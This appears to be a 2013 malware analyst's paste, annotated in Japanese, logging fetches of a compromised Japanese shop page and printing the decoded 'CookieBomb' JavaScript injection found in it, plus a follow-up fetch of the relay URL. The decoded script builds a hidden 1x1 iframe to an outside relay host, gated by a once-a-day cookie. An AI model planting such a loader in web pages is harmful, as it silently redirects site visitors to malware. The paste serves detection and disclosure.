unixfreaxjp

CookieBombインジェクションに感染されたサイトのアクセスログ...

Jul 15th, 2013
  1. // CookieBombインジェクションに感染されたサイトのアクセスログ...
  2.  
  3. --2013-07-15 16:57:36-- hxxp://www.antjapan.co.jp/catalog/
  4. Resolving www.antjapan.co.jp... 211.10.17.56
  5. Caching www.antjapan.co.jp => 211.10.17.56
  6. Connecting to www.antjapan.co.jp|211.10.17.56|:80... connected.
  7. :
  8. GET /catalog/ HTTP/1.1
  9. Host: www.antjapan.co.jp
  10. HTTP request sent, awaiting response...
  11. :
  12. HTTP/1.1 200 OK
  13. Date: Mon, 15 Jul 2013 07:55:25 GMT
  14. Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
  15. X-Powered-By: PHP/4.4.4
  16. Set-Cookie: osCsid=e1c9ded7019391417e944b64b8cbf1a4; path=/catalog
  17. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  18. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  19. Pragma: no-cache
  20. Keep-Alive: timeout=10, max=128
  21. Connection: Keep-Alive
  22. Transfer-Encoding: chunked
  23. Content-Type: text/html; charset=EUC-JP
  24. 200 OK
  25. :
  26. Length: unspecified [text/html]
  27. Saving to: ‘index.html’
  28. 2013-07-15 16:57:36 (200 KB/s) - ‘index.html’ saved [4959]
  29.  
  30. // index.htmlにオOCJP-112のマルウェア感染コードを発見しました。
  31.  
  32. // decodeすると...
  33.  
// Injected loader: builds a 1x1 px, absolutely positioned, borderless iframe
// pointing at the relay script on verdaedevelopment.com and attaches it to a
// <div id='h'> that is written into the page on first call. The 1px sizing and
// offset keep the frame effectively invisible; the fixed id 'h', the style
// pattern and the relay URL are the indicators an analyst can match on.
function zzzfff(){
var h = document.createElement('iframe');
h.src = 'hxxp://www.verdaedevelopment.com/_js/relay.php';
h.style.position = 'absolute';
h.style.border = '0';
h.style.height = '1px';
h.style.width = '1px';
h.style.left = '1px';
h.style.top = '1px';
// Guard against inserting twice: only one container div is ever written.
if (!document.getElementById('h')){
document.write('<div id=\'h\'></div>');
document.getElementById('h').appendChild(h);
}
}
// Writes a cookie cookieName=cookieValue that expires nDays days from now.
// nDays of null/0 is treated as 1 day; path is appended only when given.
// The value is encoded with the legacy escape(); the caller below passes
// nDays as the string '1', which the multiplication coerces to a number.
function SetCookie(cookieName, cookieValue, nDays, path){
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0)nDays = 1;
// 3600000 ms * 24 = one day.
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
toGMTString() + ((path) ? "; path=" + path : "");
}
// Returns the unescape()d value of the first "name=" occurrence in
// document.cookie, or null if absent. Note the lookup is a plain substring
// search, so a longer cookie name ending in `name` would also match.
function GetCookie(name){
var start = document.cookie.indexOf(name + "=");
// len = index just past "name=".
var len = start + name.length + 1;
// (!start) is only true for start === 0, and in that case the cookie string
// necessarily begins with name, so this early return can never trigger.
if ((!start) && (name != document.cookie.substring(0, name.length))){
return null;
}
if (start == - 1)return null;
var end = document.cookie.indexOf(";", len);
if (end == - 1)end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
// Entry point of the injection: the 'visited_uq' cookie is used as a one-shot
// marker. If it already reads 55 (loose == against the string value) nothing
// happens; otherwise the marker is set for one day on path '/' and the hidden
// iframe is created. Consequence for analysis: a browser or crawler that
// keeps cookies sees the iframe only once per day, so re-fetching the page to
// confirm the infection should be done with cookies cleared.
if (navigator.cookieEnabled){
if (GetCookie('visited_uq') == 55){
}
else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}
  75.  
  76. // マルウェアのリンクをフォローすると....
  77.  
  78. --2013-07-15 17:06:16-- hxxp://www.verdaedevelopment.com/_js/relay.php
  79. Resolving www.verdaedevelopment.com... 174.120.172.123
  80. Caching www.verdaedevelopment.com => 174.120.172.123
  81. Connecting to www.verdaedevelopment.com|174.120.172.123|:80... connected.
  82. :
  83. GET /_js/relay.php HTTP/1.1
  84. Referer: http://www.antjapan.co.jp/catalog/
  85. Host: www.verdaedevelopment.com
  86. HTTP request sent, awaiting response...
  87. :
  88. HTTP/1.1 200 OK
  89. Date: Mon, 15 Jul 2013 08:04:06 GMT
  90. Server: Apache
  91. Keep-Alive: timeout=5, max=75
  92. Connection: Keep-Alive
  93. Transfer-Encoding: chunked
  94. Content-Type: text/html
  95. 200 OK
  96. Length: unspecified [text/html]
  97. Saving to: ‘relay.php’
  98. 2013-07-15 17:06:17 (20.8 KB/s) - ‘relay.php’ saved [2]
  99.  
  100. // 「relay.php」はマルウェア転送スクリプトで、条件/タイミングが合わないと「ok」などの回答が出る。
  101. $ cat relay.php
  102. ok